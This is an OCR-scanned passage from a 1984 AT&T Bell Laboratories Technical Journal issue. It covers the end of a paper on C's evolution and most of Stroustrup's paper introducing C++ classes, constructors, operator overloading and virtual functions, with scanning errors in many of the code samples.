OCTOBER 1984 program automatically generated files describing the dependencies for use by the make utility, 11 or its enhancement, the build utility. 12 This attempt foundered because of the need to create and maintain hidden interface files separate from the source files. This arose because of the possibility of circular dependencies between the variables in several files. The solution to this problem — explicitly separating the external interfaces from the program text and managing the depend- encies using a database manager — is now part of the Ada* language and programming support environment. The valuable idea of generating “makefiles” automatically by ana- lyzing the inclusions of header files is being incorporated in other tools, however. IX. SUMMARY In its decade of existence, C grew beyond its original conception as a language for implementing operation systems into a full general- purpose language. This was accomplished by small changes, mostly backward-compatible, that have not fundamentally altered the original sparse design. A major trend in the development of the language is toward stricter type checking, particularly in the use of pointers and in function argument type checking. On the other hand, the model of computation remains close to that of the underlying hardware. Though mature, the C language continues to evolve in a controlled way. Internal and external standardization activities will continue to impose requirements for backward compatibility in the future. X. ACKNOWLEDGMENTS Dennis M. Ritchie, the author of C, continues to be closely associ- ated with its evolution and standardization. His perceptive observa- tions and insights over the years are greatly appreciated. Many colleagues provided useful comments on drafts of this paper. I particularly thank Bjarne Stroustrup, whose ideas are strongly influencing the future evolution of the language. Lively discussions among the members of the X3J11 committee have helped clarify many potential misinterpretations of the language specification. Because of their potential value, the proposals described in Sections 7.1 (argument typing) and 7.2 (const) have been accepted by the X3J11 committee. f Trademark of the U.S. Department of Defense, Ada Joint Program Office. EVOLUTION OF C 117 REFERENCES 1. D. M. Ritchie and K. L. Thompson, The UNIX Timesharing System , Commun. ACM, 17, No. 7 (July 1974), pp. 365-75. 2. B. W. Kernighan and D. M. Ritchie, The C Programming Language , Englewood Cliffs, N.J.: Prentice-Hall, 1978. 3. D. M. Ritchie, S. C. Johnson, M. E. Lesk, and B. W. Kernighan, “The C Program- ming Language,” B.S.T.J., 57, No. 6, Part 2 (July-August 1978), pp. 81-114. 4. IEEE Standard Pascal Computer Programming Language , New York: The Institute of Electrical and Electronics Engineers, Inc., 1983. 5. S. C. Johnson and D. M. Ritchie, “Portability of C Programs and the UNIX System,” B.S.T.J., 57, No. 6, Part 2 (July-August 1978), pp. 114-141. 6. Draft 10.0 of IEEE Task P754, A Proposed Standard for Binary Floating-Point Arithmetic , December 2, 1982. 7. L. Rosier, “The Best of UNIX on GCOS,” Honeywell Large Systems Users’ Association, October 1978. 8. B. Stroustrup, “The UNIX System: Data Abstraction in C,” AT&T Bell Lab. Tech. J., this issue. 9. B. Stroustrup, private communication. 10. R. J. Mascitti, private communication. 11. S. I. Feldman, “Make— A Program for Maintaining Computer Programs,” Software Practice and Experience, 9 , No. 4 (April 1979), pp. 255-65. 12. V. B. Erickson and J. F. Pellegrin, “Build— A Software Construction Tool,” AT&T Bell Lab. Tech. J., 63, No. 6, Part 2 (July-August 1984), pp. 1049-59. AUTHOR Lawrence Rosier, A.B. (Physics), 1953, Cornell University; M.S., Ph.D. (Physics), Yale University, in 1954 and 1958, respectively; AT&T Bell Labo- ratories, 1957 — . Mr. Rosier is Supervisor of the Language Systems Engineer- ing group in the UNIX Languages and Programming Environment Develop- ment department. His early work involved the development of solid-state electronic devices. His more recent work includes the design of languages for interactive graphics terminals, the implementation of the C language and libraries on various systems, and the management of C language development for UNIX systems. Chairman, Language Subcommittee, American National Standards Institute Technical Committee X3J11 for the Programming Lan- guage C; member, ACM, APS, Sigma Xi, AAAS. 118 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: Data Abstraction in C By B. STROUSTRUP* (Manuscript received August 5, 1983) C++ is a superset of the C programming language; it is fully implemented and has been used for nontrivial projects. There are now more than one hundred C++ installations. This paper describes the facilities for data abstrac- tion provided in C++. These include Simula-like classes providing (optional) data hiding, (optional) guaranteed initialization of data structures, (optional) implicit type conversion for user-defined types, and (optional) dynamic typing; mechanisms for overloading function names and operators; and mechanisms for user-controlled memory management. It is shown how a new data type, like complex numbers, can be implemented, and how an “object-based” graph- ics package can be structured. A program using these data abstraction facilities is at least as efficient as an equivalent program not using them, and the compiler is faster than older C compilers. I. INTRODUCTION The aim of this paper is to show how to write C++ programs using “data abstraction”, as described below*. This paper presents some general discussion of each new language feature to help the reader * AT&T Bell Laboratories. f Note on the name C++: ++ is the C increment operator; when this operator is applied to a variable (typically a vector index or a pointer), it increments the variable so that it denotes the succeeding element. The name C++ was coined by Rich Mascitti. Consider ++ a surname, to be used only on formal occasions or to avoid ambiguity. Among friends C++ is referred to as C, and the C language described in the C book 1 is “old C”. The slightly shorter name C+ is a syntax error; it has also been used as the Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 119 understand where that feature fits in the overall design of the language, which programming techniques it is intended to support, and what kinds of errors and costs it is intended to help the programmer avoid. However, this paper is not a reference manual, so it does not give complete details of the language primitives; these can be found in Ref. 3. C++ evolved from C 1 through some intermediate stages, collectively known as “C with classes”. 4,5 The primary influence on the design of the abstraction facilities was the Simula67 class concept. 6,7 The intent was to create data abstraction facilities that are both expressive enough to be of significant help in structuring large systems, and at the same time useful in areas where C’s terseness and ability to express low- level detail are great assets. Consequently, while C classes provide general and flexible structuring mechanisms, great care has been taken to ensure that their use does not cause run time or storage overhead that could have been avoided in old C. Except for details like the introduction of new key words, C++ is a superset of C; see Section XXII, “Implementation and Compatibility” below. The language is fully implemented and in use. Tens of thou- sands of lines of code have been written and tested by dozens of programmers. The paper falls into three main sections: 1. A brief presentation of the idea of data abstraction. 2. A full description of the facilities provided for the support of that idea through the presentation of small examples. This in itself falls into three sections: a. Basic techniques for data hiding, access to data, allocation, and initialization. Classes, class member functions, constructors, and func- tion name overloading are presented (starts with Section III, “Restric- tion of Access to Data”). b. Mechanisms and techniques for creating new types with associ- ated operators. Operator overloading, user-defined type conversion, references, and free store operators are presented (starts with Section VIII, “Operator Overloading and Type Conversion”). c. Mechanisms for creating abstraction hierarchies, for dynamic typing of objects, and for creating polymorphic classes and functions. Derived classes and virtual functions are presented (starts with Section XIV, “Derived Classes”). Items b and c do not depend directly on each other. name of an unrelated language. Connoisseurs of C semantics find C++ inferior to ++C, but the latter is not an acceptable name. The language is not called D, since it is an extension of C and does not attempt to remedy problems inherent in the basic structure of C. The name C++ signifies the evolutionary nature of the changes from old C. For yet another interpretation of the name C++ see the Appendix of Ref. 2. 120 TECHNICAL JOURNAL, OCTOBER 1984 3. Finally some general observations on programming techniques, on language implementation, on efficiency, on compatibility with old C, and on other languages are offered (starts with Section XVIII, “Input and Output”). A few sections are marked as “digressions”; they contain information that, while important to a programmer, and hopefully of interest to the general reader, does not directly relate to data abstraction. II. DATA ABSTRACTION “Data abstraction” is a popular, but generally ill-defined, technique for programming. The fundamental idea is to separate the incidental details of the implementation of a subprogram from the properties essential to the correct use of it. Such a separation can be expressed by channeling all use of the subprogram through a specific “interface”. Typically the interface is the set of functions that may access the data structures that provide the representation of the “abstraction”. One reason for the lack of a generally accepted definition is that any language facility supporting it will emphasize some aspects of the fundamental idea at the expense of others. For example: 1. Data hiding — Facilities for specifying interfaces that prevent corruption of data and relieve a user from the need to know about implementation details. 2. Interface tailoring — Facilities for specifying interfaces that sup- port and enforce particular conventions for the use of abstractions. Examples include operator overloading and dynamic typing. 3. Instantiation — Facilities for creating and initializing of one or more “instances” (variables, objects, copies, versions) of an abstrac- tion. 4. Locality — Facilities for simplifying the implementation of an abstraction by taking advantage of the fact that all access is channeled through its interface. Examples include simplified scope rules and calling conventions within an implementation. 5. Programming environment — Facilities for supporting the con- struction of programs using abstractions. Examples include loaders that understand abstractions, libraries of abstractions, and debuggers that allow the programmer to work in terms of abstractions. 6. Efficiency — A language facility must be “efficient enough” to be useful. The intended range of applications is a major factor in deter- mining which facilities can be provided in a language. Conversely, the efficiency of the facilities determines how freely they can be used in a given program. Efficiency must be considered in three separate con- texts: compile time, link time, and run time. The emphasis in the design of the C data abstraction facility was on 2, 3, and 6, that is, on facilities enabling a programmer to provide DATA ABSTRACTION 121 elegant and efficient interfaces to abstractions. In C, data abstraction is supported by enabling the programmer to define new types, called “classes”. The members of a class cannot be accessed, except in an explicitly declared set of functions. Simple data hiding can be achieved like this: class data_type { /* data declarations */ /* list of functions that may use the data declarations ("friends”) */ where only the “friends” can access the representation of variables of class data_type as defined by the data declarations. Alternatively, and often more elegantly, one can define a data type where the set of functions that may access the representation is an integral part of the type itself: class object_type ( /* declarations used to implement object_type */ public : /* declarations specifying the interface to object__type */ One obvious, but nontrivial, aim of many modern language designs is to enable programmers to define “abstract data types” with prop- erties similar to the properties of the fundamental data types of the languages. Below we show how to add a data type complex to the C language, so that the usual arithmetic operators can be applied to complex variables. For example: complex a r x, y, z; a = x/y + 3*z ; The idea of treating an object as a black box is further supported by a mechanism for hierarchically constructing classes out of other classes. For example: class shape { • • • \ ; class circle : shape ( • • • J ; The class circle can be used as a simple shape in addition to being used as a circle. Class circle is said to be a derived class with class shape as its base class. It is possible to leave the resolution of the type of objects sharing common base classes to run time. This allows objects of different types to be manipulated in a uniform manner. 122 TECHNICAL JOURNAL, OCTOBER 1984 III. RESTRICTION OF ACCESS TO DATA Consider a simple old C fragment, f outlining an implementation of the concept of a date: struct date { int day, month, year; }; struct date today; extern void set__date(); extern void next_date(); extern void next_today( ) ; extern void pr int_date ( ) ; There are no explicit connections between the functions and the data type, and no indication that these functions should be the only ones to access the members of the structure date. It ought to be possible to state such an intent. A simple way of doing this is to declare a data type that can only be manipulated by a specific set of functions. For example: class date { int day, month, year; friend void set— date ( date* , int, int, int), next— date ( date* ) , next_today ( ) , pr int_date ( date* ) ; ) ; The key word class indicates that only functions mentioned as “friends” in the declaration can use the class member names day, month, and year; otherwise a class behaves like a traditional C struct. That is, the class declaration itself defines a new type of which variables can be declared. For example: date my_birthday, today; set— date (&my_ birthday , 30,12, 1950 ) ; set— date (&today, 23,6 , 1983); print-date (&today ) ; next-date (&today ) ; Friend functions are defined in the usual manner. For example: void next— date (date* d) { if ( 4* +d— >day > 28 ) { f The key word void specifies that a function does not return a value. It was introduced into C about 1980. DATA ABSTRACTION 123 /* do the hard part */ This solution to the problem of data hiding is simple, and often quite effective. It is not perfectly flexible because it allows access by the “friends” to all variables of a type. For example, it is not possible to have a different set of friends for the dates my_birthday and today. A function can, however, be the friend of more than one class. The importance of this will be demonstrated in Section XIX. There is no requirement that a friend should only manipulate variables passed to it as arguments. For example, the name of a global variable may be built into a function: void next_today( ) { if ( + +today . day > 28 ) { /* do the hard part */ i ) The protection of the data from functions that are not friends relies on restricting the use of class member names. It can therefore be circumvented by address manipulation and explicit type conversion. There are several benefits to be obtained from restricting a data structure’s access to an explicitly declared list of functions. Any error causing an illegal state of a date must be caused by code in the friend functions, so the first stage of debugging, localization, is completed before the program is even run. This is a special case of the general observation that any change to the behavior of the type date can and must be effected by changes to its friends. Another advantage is that a potential user of such a type need only examine the definition of the friends to learn to use it. Experience with C++ has amply demon- strated this. IV. DIGRESSION: ARGUMENT TYPES The argument types of the functions above were declared. This could not have been done in old C, nor would the matching function definition syntax used for next_date have been accepted. In C++ the semantics of argument passing are identical to those of initialization. In particular, the usual arithmetic conversions are performed. A func- tion declaration that does not specify an argument type, for example next_today ( ), specifies that the function does not accept any argu- ments. This is different from old C; see Section XXII, “Implementa- 124 TECHNICAL JOURNAL, OCTOBER 1984 tion and Compatibility” below. The argument types of all declarations and the definition of a function must match exactly. It is still possible to have functions that take an unspecified and possibly variable number of arguments of unspecified types, but such relaxation of the type checking must be explicitly declared. For ex- ample: int wild( • • • ) ; int f pr intf ( FILE* , char* •••); The ellipsis specifies that any arguments (or none) will be accepted without any checking or conversion exactly as in old C. For example: wild( ) ; wild( "asdf " , 1 0 ) ; wild( 1 . 3 , "gh jk" , wild ) ; f printf ( stdout , "x=%d" ,10); f pr intf ( stderr , " f ile %s line %d\n", f_name r l_no); Note that the first two arguments of f printf must be present and will be checked. It has been noted, however, that functions with partly specified argument types are far less useful in C++ than they are in old C. Such functions are primarily useful for specifying interfaces to old C libraries. Default function arguments (Section IX), overload function names (Section VII), and operator overloading (Section VIII) are used instead. See also Section XVIII. As ever, undeclared functions may be used and will be assumed to return integers. They must, however, be used consistently. For exam- ple: undef1(1, "asdf"); undef1(2, "ghjk" ); /* fine */ undef2(1 f "asdf"); undef 2 ( "gh jk” , 2); /* error */ The inconsistent use of undef 2 is detected by the compiler. V. OBJECTS The structure of a program using the class/friend mechanism to restrict access to the representation of a data type is exactly the same as the structure of a program not using it. This implies that no advantage has been taken of the new facility to make the functions implementing the operations on the type easier to write. For many types, a more elegant solution can be obtained by incorporating such functions into the new type itself. For example: class date { int day, month, year; public : void set(int, int, int); void next ( ) ; DATA ABSTRACTION 125 void print ( ) ; Functions declared this way are called member functions and can be invoked only for a specific variable of the appropriate type using the standard C structure member syntax. Since the function names no longer are global, they can be shorter: my_birthday. print ( ) ; today . next ( ) ; On the other hand, to define a member function, one must specify both the name of the function and the name of its class: void date . next ( ) { if ( -H-day > 28 ) { /* do the hard part */ Variables of such types are often referred to as objects. The object for which the function is invoked constitutes a hidden argument to the function. In a member function, class member names can be used without explicit reference to a class object. In that case, like the use of day above, the name refers to that member of the object for which the function was invoked. A member function sometimes needs to refer explicitly to this object, for example to return a pointer to it. This is achieved by having the key word this denote that object in every class function. Thus, in a member function this->day is equiv- alent to day for every member of the class date . The public label separates the class body into two parts. The names in the first, “private”, part can only be used by member functions (and friends). The second, “public”, part constitutes the interface to objects of the class. A class function may access both public and private members of every object of its class, not just members of the one for which it was invoked. The relative merits of friends and member functions will be dis- cussed in Section XIX after a larger body of examples has been presented. For now, it is sufficient to notice that a friend is not affected by the “public/private” mechanism and operates on objects in a standard and explicit manner. A member, on the other hand, must be invoked for an object and treats that object differently from all others. VI. STATIC MEMBERS A class is a type, not a data object, and each object of the class has its own copy of the data members of the class. However, there are 126 TECHNICAL JOURNAL, OCTOBER 1984 concepts (abstractions) that are best supported if the different objects of the class share some data. For example, to manage tasks in an operating system or a simulation, a list of all tasks is often useful: class task f task* next; static task* task_chain; void schedule ( int ) ; void wait(event); Declaring the member task_chain as static ensures that there will only be one copy of it, not one copy per task object. It is still in the scope of class task, however, and can only be accessed from “the outside” if it was declared public. In that case its name must be qualified by its class name: task: :task_chain In a member function it can be referred to as plain task_chain . The use of static class members can reduce the need for global variables considerably. The operator :: (colon colon) is used to specify the scope of a name in expressions. As a unary operator it denotes external (global) names. For example, if the task function wait in a simulator needs to call a nonmember function wait, it can be done like this: void task .wait ( event e) : :wait ( e ) ; } VII. CONSTRUCTORS AND OVERLOADED FUNCTIONS The use of functions like set_date( ) to provide initialization for class objects is inelegant and error prone. Since it is nowhere stated that an object must be initialized, a programmer can forget to do so or, often with equally disastrous results, do so twice. A better approach is to allow the programmer to declare a function with the explicit purpose of initializing objects. Because such a function constructs values of a given type, it is called a constructor. A constructor is recognized by having the same name as the class itself. For example: class date { DATA ABSTRACTION 127 date(int, int, int); When a class has a constructor all objects of that class must be initialized: date today = date(23, 6, 1983); date xmas(25, 12, 0); /* legal abbreviated form */ date july4 = today; date my_birthday; /* illegal, initializer missing */ It is often nice to provide several ways of initializing a class object. This can be done by providing several constructors. For example: class date { date(int, int, date ( char* ) ; date ( int ) ; date ( ) ; int); /* day month year */ /* date in string representation : /* day, assume current month and year /* default date: today */ As long as the constructor functions differ in their argument types, the compiler can select the correct one for each use: date today ( 4 ) ; date july4 ( "July 4, 1983"); date guy("5 Nov"); date now; /* default initialized */ Constructors are not restricted to initialization, but can be used wherever it is meaningful to have a class object: date us_date(int month, int day, int year) { return date(day, month, year); some_f unction ( us_date ( 1 2 , 24 , 1 98 3 ) ); Some_f unction ( date ( 24 , 1 2 , 1 98 3 ) ); When several functions are declared with the same name, that name is said to be overloaded. The use of overloaded function names is not restricted to constructors. However, for nonmember functions the function declarations must be preceded by a declaration specifying that the name is to be overloaded; for example: overload print; 128 TECHNICAL JOURNAL, OCTOBER 1984 void print(int); void pr int ( char* ) ; or possibly abbreviated like this: overload void print(int), pr int ( char *) ; As far as the compiler is concerned, the only thing common for a set of functions of the same name is that name. Presumably they are in some sense similar, but the language does not constrain or aid the programmer. Thus, overloaded function names are primarily a nota- tional convenience. This convenience is significant for functions with conventional names like sqrt, print, and open. Where a name is semantically significant, as in the case of constructors, this conven- ience becomes essential. For example, consider writing a single con- structor for class date above. For arguments to functions with overloaded names the C type conversion rules do not apply fully. The conversions that may destroy information are not performed, leaving only char->short->int-> long, f loat->double, and int->double. It is, however, possible to provide different functions for integral and floating types. For example: overload print(int), print ( double ) ; The list of functions for an overloaded name will be searched in order of appearance for a match, so that print ( 1 ) will invoke the integer print function, and pr int ( 1 . 0 ) the floating-point print function. Had the order of declaration been reversed, both calls would have invoked the floating-point print function with the double representation of 1. VIII. OPERATOR OVERLOADING AND TYPE CONVERSION Some languages provide a complex data type, so that programmers can use the mathematical notion of complex numbers directly. Since C does not, it is an obvious test of an abstraction facility to see to what extent the conventional notion of complex numbers can be supported (Note, however, that complex is an unusual data type in that it has an extremely simple representation and there are very strong traditions for its proper use. It is, therefore, primarily a test of the abstraction facility’s power to imitate conventional notation. In most other cases the designer’s attention will be directed towards finding a good representation of the abstraction and towards finding a suitable way of presenting the abstraction to its users.) The aim of the exercise is to be able to write code like this: complex x; complex a = complex(1, 1.23); DATA ABSTRACTION 129 complex b = 1 ; complex c = PI; if (x!=a) x = a+log(b*c )/2 ; That is, the standard arithmetic and comparison operators must be defined for complex numbers and for mixtures of complex and scalar constants and variables. Here is a declaration of a very simple class complex: class complex { double re, im; friend complex operator-H (complex, complex); friend complex operator* (complex, complex); friend int operator != (complex, complex); public : complex ( ) { re=im=0; ) complex ( double r) { re=r; im=0 ; ) complex ( double r, double i) j re=r; im=i ; ) An operator is recognized as a function name when it is preceded by the key word operator. When an operator is used for a class type, the compiler will generate a call to the appropriate function, if de- clared. For example, for complex variables xx and yy the addition xx+yy will be interpreted as operator+( xx , yy ) , given the declaration of class complex above. The complex add function could be defined like this: complex operator+( complex al, complex a2) return complex ( a 1 . re+a2 . re , a 1 . im+a2 . im) ; ) Naturally, all names of the form operator® are overloaded. To ensure that the language is only extendable and not mutable, an operator function must take at least one class object argument. By declaring operator functions the programmer can assign meaning to the standard C operators applied to objects of user-specified data types. These operators retain their usual places in the C syntax, and it is not possible to add new operators. It is, therefore, not possible to change the precedence of an operator or to introduce a new operator (for example, ** for exponentiation). This restriction keeps the anal- ysis of C expressions simple. Declarations of functions for unary and binary operators are distin- guished by their number of arguments. For example: 130 TECHNICAL JOURNAL, OCTOBER 1984 class complex { friend complex operator- ( complex ) ; friend complex operator- ( complex , complex); I ; There are three ways the designer of class complex could decide to handle mixed-mode arithmetic, like xx+i, where xx is a complex variable. It can simply be considered illegal, so that the user has to write the conversion from double to complex explicitly: xx+complex ( i ) . Alternatively, several complex add functions may be specified: complex operator+( complex , complex); complex operator+( complex , double); complex operator+( double , complex); so that the compiler will choose the appropriate function for each call. Finally, if a class has constructors that take a single argument, then they will be taken to define conversions from their argument type to the type for which they construct values. Thus, with the declaration of class complex above xx+1 would automatically be interpreted as operator+(xx , complex ( 1 ) ). This last alternative violates many people’s idea of strong typing. However, using the second solution will nearly triple the number of functions needed and the first provides little notational convenience to the user of class complex. Note that complex numbers are typical with respect to the desirability of mixed-mode arithmetic. A typical data type does not exist in a vacuum. Furthermore, for many types there exists a trivial mapping from the C numeric and/or string constants into a subset of the values of the type (similar to the mapping of the C numeric constants into the complex values on the real axis). The friend approach was chosen in favor of using member func- tions for the operator functions. The inherent asymmetry in the notion of objects does not match the traditional mathematical view of complex numbers. IX. DIGRESSION: DEFAULT ARGUMENTS AND INLINE FUNCTIONS Class complex had three constructors, two of which simply provided the default value zero for notational convenience of the programmer. This use of overloading is typical for constructors, and also has been found to be quite common for other functions. However, overloading is a quite elaborate and indirect way of providing default argument values and, in particular for more complicated constructors, quite verbose. Consequently, a facility for expressing default arguments directly is provided. For example: DATA ABSTRACTION 131 class complex { public : complex ( double r = 0, double i = 0) { re=r; im=i ; } h When a trailing argument is missing the default constant expression can be used. For example: complex a ( 1 , 2 ) ; complex b( 1 ) ; /* b = complex (1,0) */ complex c; /* c = complex (0,0) */ When a member function, like complex above, is not only declared, but also defined (that is, its body is presented) in a class declaration, it may be inline substituted when called, thus eliminating the usual function call overhead. An inline substituted function is not a macro; its semantics are identical to other functions. Any function can be declared inline by preceding its definition by the key word inline. Inline functions can make class declarations quite untidy; they will only improve run-time efficiency if used judiciously, and will always increase the time and space needed to compile a program. They should therefore be used only when a significant improvement of run-time is expected. They are included in C++ because of experience with C macros. Macros are sometimes essential for an application (and it is not possible to have a class member macro), but more often they create chaos by appearing to be functions without obeying the syntax, scope, and argument passing rules of functions. X. STORAGE MANAGEMENT There are three storage classes in C++: static, automatic (stack), and free (dynamic). Free store is managed by the programmer through the operators new and delete. No standard garbage collector is provided.* Constructors are handy for hiding details of free store management. For example: class string { char* rep; f It is, however, not that difficult to write a garbage-collecting implementation of the new operator, as has been done for the old C free store allocator function mal loc ( ) . It is not in general possible to distinguish pointers from other data items when looking at the memory of a running C program, so a garbage collector must be conservative in its choice of what to delete, and it must examine unappealingly large amounts of data. They have been found useful for some applications, though. 132 TECHNICAL JOURNAL, OCTOBER 1984 str ing( char* ) ; ~string( ) ( delete rep; j string. string( char* p) i rep = new char [strlen(p)+1 ] ; strcpy ( rep , p ) ; ) Here the use of free store is encapsulated in the constructor string ( ) and its inverse, the destructor ~s tr ing ( ) . Destructors are implicitly called when an object goes out of scope. They are also called when an object is explicitly deleted by delete. For static objects destructors are called after all parts of the program as the program terminates. The new operator takes a type as its argument and returns a pointer to an object of that type; delete takes such a pointer as argument. A string may itself be allocated on the free store. For example: string* p = new string( "asdf " ) ; delete p; p = new str ing ( "qwerty " ) ; It is furthermore possible for a class to take over the free store management for its objects. For example: class node j int type; node* 1 ; node* r; node ( ) ( ~node( ) { For an object created by new, the this pointer will be zero when a constructor is entered. If the constructor does not assign to this the standard allocator function is used. The standard deallocator function will be used at the end of a destructor if and only if this is nonzero. An allocator provided by the programmer for a specific class or set of classes can be much simpler and at least an order of magnitude faster than the standard allocator. Using constructors and destructors, the designer may specify data types, like string above, where the size of the representation of an object can vary, even though the size of every static and automatic variable must be known at load time and compile time, respectively. if ( this=0 ) this = new_node(); } f ree_node ( this ) ; this =0; ( DATA ABSTRACTION 133 The class object itself is of fixed size, but its class maintains a variable- sized secondary data structure. XL HIDING STORAGE MANAGEMENT Constructors and destructors cannot completely hide storage man- agement details from the user of a class. When an object is copied, either by explicit assignment or by passing it as a function argument, the pointers to secondary data structures are copied too. This is sometimes undesirable. Consider the problem of providing value se- mantics for a simple data type string. A user sees a string as a single object, but the implementation consists of two parts, as outlined above. After the assignment sl=s2 both strings refer to the same representation, and the store used for the old representation of s 1 is unreferenced. To avoid this, the assignment operator can be over- loaded. class string { char* rep; void operator=( string ) ; void string. operator=( string source) ( if (rep != source. rep) j delete rep; rep = new char[ strlen( source . rep)-M ]; strcpy( rep , source . rep ) ; 1 } Since the function needs to modify the target string, it is best written as a member function taking the source string as argument. The assignment s I=s2 will now be interpreted as s 1 . operators s2 ) . This leaves the problem of what to do with initializers and function arguments. Consider string si = "asdf"; string s2 = si; do_something( s2 ) ; This leaves the strings si, s2 , and the argument of do_soraething with the same rep. The standard bitwise copy clearly does not preserve the desired value semantics for strings. The semantics of argument passing and initialization are identical; both involve copying an object into an uninitialized variable. They 134 TECHNICAL JOURNAL, OCTOBER 1984 differ from the semantics of assignment (only) in that an object assigned to is assumed to contain a value, and an object being initial- ized is not. In particular, constructors are used in argument passing exactly as in initialization. Consequently, the undesirable bitwise copy can be avoided if we can specify a constructor to perform the proper copy operation. Unfortunately, using the obvious constructor class string { string( string) ; ) leads to infinite recursion. It is therefore illegal. To solve this problem, a new type “reference” is introduced. It is syntactically identified by the declarator &, which is used in the same way as the pointer declarator *. When a variable is declared to be a T&, that is a reference to T, it can be initialized either by a pointer to type t or an object of type t. In the latter case the address of operator & is implicitly applied. For example: int x; int& rl = &x; int& r2 = x; assigns the address of x to both r 1 and r2. When used, a reference is implicitly dereferenced; so, for example: rl = r 2 means copy the object pointed to by r 2 into the object pointed to by rl. Note that initialization of a reference is quite different from assignment to it. Using references class string can now be declared like this: class string { char* rep; string ( char* ) ; str ing( string&) ; ~string( ) ; void operator=( str ing& ) ; str ing ( str ing& source) 1 rep = new char[ str len( source . rep )+1 ]; strcpy( rep, source . rep ) ; DATA ABSTRACTION 135 Initialization of one string with another (and passing a string as an argument) will now involve a call of the constructor string ( str ing& ) that will correctly duplicate the representation. The string assignment operator was redeclared to take advantage of references. For example: void string . operator=( string& source) ( if (this != &source) { delete rep; rep = new char[ str len ( source . rep )+1 ]; strcpy(rep f source. rep) ; This type string will not be efficient enough for many applications. It is, however, not difficult to modify it so that the representation is only copied when necessary and shared otherwise. XII. FURTHER NOTATIONAL CONVENIENCE It is curious that references, a facility with great similarity to the “call by reference” rules for argument passing in many languages, are introduced primarily to enable a programmer to specify “call by value” semantics for argument passing. They have several other uses as well, however, including of course “by reference” argument passing. In particular, references provide a way of having nontrivial expressions on the left-hand side of assignments. Consider a string type with a substring operator: class string j void operator=( string& ) ; void operator=( char* ) ; string& operator ()( int dos. int length); ); where operator ( ) denotes function application. For example, string si = "asdf” ; string s2 = "ghjkl" ; si (1,2) = "xyz"; /* s 1 = "axyzf " */ s2 = si (0,3); /* s2 = "axy" */ The two assignments will be interpreted as: ( s 1 . operator ()( 1 , 2 ) ) ->operator=( " xyz " ) ; s2 . operator=( s 1 . operator ()( 0 , 3 ) ); The operator ( ) function need not know whether it is invoked on the 136 TECHNICAL JOURNAL, OCTOBER 1984 left-hand or the right-hand side of the assignment. The operator= function can take care of that. Vector element selection can be similarly overloaded by defining operator [ ] . XIII. DIGRESSION: REFERENCES AND TYPE CONVERSION Conversions defined for a class are applied even when references are involved. Consider a class string where assignment of simple character strings is not defined, but the construction of a string from such a character string is: class string j string( char* ) ; void operator=( string&) ; string s = "asdf" ; The assignment s = "ghjk" ; is legal, and will produce the desired effect. It is interpreted as s.operator=( ( temp. string( "ghjk" ) , &temp) ) where temp is a temporary variable of type string. Applying construc- tors before taking the address as required by the reference semantics ensures that the expressive power provided by constructors is not lost for variables of reference type. In other words, the set of values accepted by a function expecting an argument of type t is the same as that accepted by a function expecting a T&(reference to t). XIV. DERIVED CLASSES Consider writing a system for managing geometric shapes on a terminal screen. An attractive approach is to treat each shape as an object that can be requested to perform certain actions like “rotate” and “change color”. Each object will interpret such requests in accord- ance with its type. For example, the algorithm for rotation is likely to be different (simpler) for a circle than for a triangle. What is needed is a single interface to a variety of co-existing implementations. The different kind of shapes cannot be assumed to have similar represen- tations. They may differ widely in complexity, and it would be a pity to be unable to utilize the inherent simplicity of basic shapes like circle and triangle because of the need to support complex shapes like “mouse” and “British Isles”. DATA ABSTRACTION 137 The general approach is to provide a class shape defining the common properties of shapes, in particular a “standard interface”. For example: class shape point int shape* static public : void move(point to) { center=to; draw( ) ; } point where ( ) { return center; } virtual void rotate(int); virtual void draw( ) ; center ; color ; next ; shape* shape_chain; The functions that cannot be implemented without knowledge of the specific shape are declared virtual. A virtual function is expected to be defined later. At this stage only its type is known; this, however, is sufficient to check calls to it. A class defining a particular shape may be defined like this: class circle : public shape { float radius; public : void rotate(int angle) {} void draw( ) ; This specifies a circle to be a shape, and as such it has all the members of class shape in addition to its own members. The class shape, uircies can now be declared and used: circle cl; shape* sh; point p( 100, 30) ; cl . draw( ) ; cl .move (p) ; sh = &cl; sh->draw( ) ; Naturally the function called by cl. draw ( ) is circle: :draw( ) , and since circle did not define its own move( ), the function called by 138 TECHNICAL JOURNAL, OCTOBER 1984 cl. move (p) is shape: :move( ) , which class circle inherited from class shape. However, the function called by sh->draw() is also circle: :draw(), despite the fact that no reference to class circle is found in the declaration of class shape. A virtual function is redefined when a class is derived from its class. Each object of a class with virtual functions contains a type indicator. This enables the compiler to find the proper virtual function for a call even when the type of the object is not known at compile time. Calling a virtual function is the only way of using the hidden type indicator in a class (a class without virtual functions does not have such an indicator). A shape may also provide facilities that cannot be used unless the programmer knows its particular type. For example: class clock_face : public circle { line hour_hand, minute_hand; public : void draw( ) ; void rotate(int); void set(int, int); void advance ( int ) ; The time displayed by the clock can be set( ) to a particular time, and one can advance ( ) the displayed time a number of minutes. The draw( ) in clock_face hides circle: :draw( ) , so that the latter can only be called by its full name. For example: void clock_f ace . draw( ) { circle : : draw( ) ; hour_hand . draw( ) ; minute_hand . draw( ) ; i Note that a virtual function must be a member. It cannot be a friend, and there is no equivalent in the class/ friend style of program- ming to the use of dynamic typing presented here and in the following section. XV. DIGRESSION: STRUCTURES AND UNIONS The C constructs struct and union are legal, but conceptually absorbed into classes. A struct is a class with all members public; that is struct s j • • • } ; DATA ABSTRACTION 139 is equivalent to class s { public: ••• }; A union is a struct that can hold exactly one data member at a time. These definitions imply that struct or a union can have function members. In particular, they can have constructors. For example: { i=ii; ) ! p=pp; ) This takes care of most problems concerning initialization of unions. For example: uu ul = 1 ; uu u2 = "asdf" ; XVI. POLYMORPHIC FUNCTIONS By using derived classes, one can design interfaces providing uni- form access to objects of unknown and/or different classes. This can be used to write polymorphic functions, that is, functions where the algorithm is specified so that it will apply to a set of different argument types. For example: void sort ( common* v[], int size) I /* sort the vector of commons ”v[size]” */ 1 The sort function need only be able to compare objects of class common to perform its task. So. if class common has a virtual function cmpr ( ) , sort ( ) will be able to sort vectors of objects of any class derived from class common for which cmpr ( ) is defined. For example: class common { virtual int cmpr ( common* ) ; i ; class apple : public common { int key; int cmpr 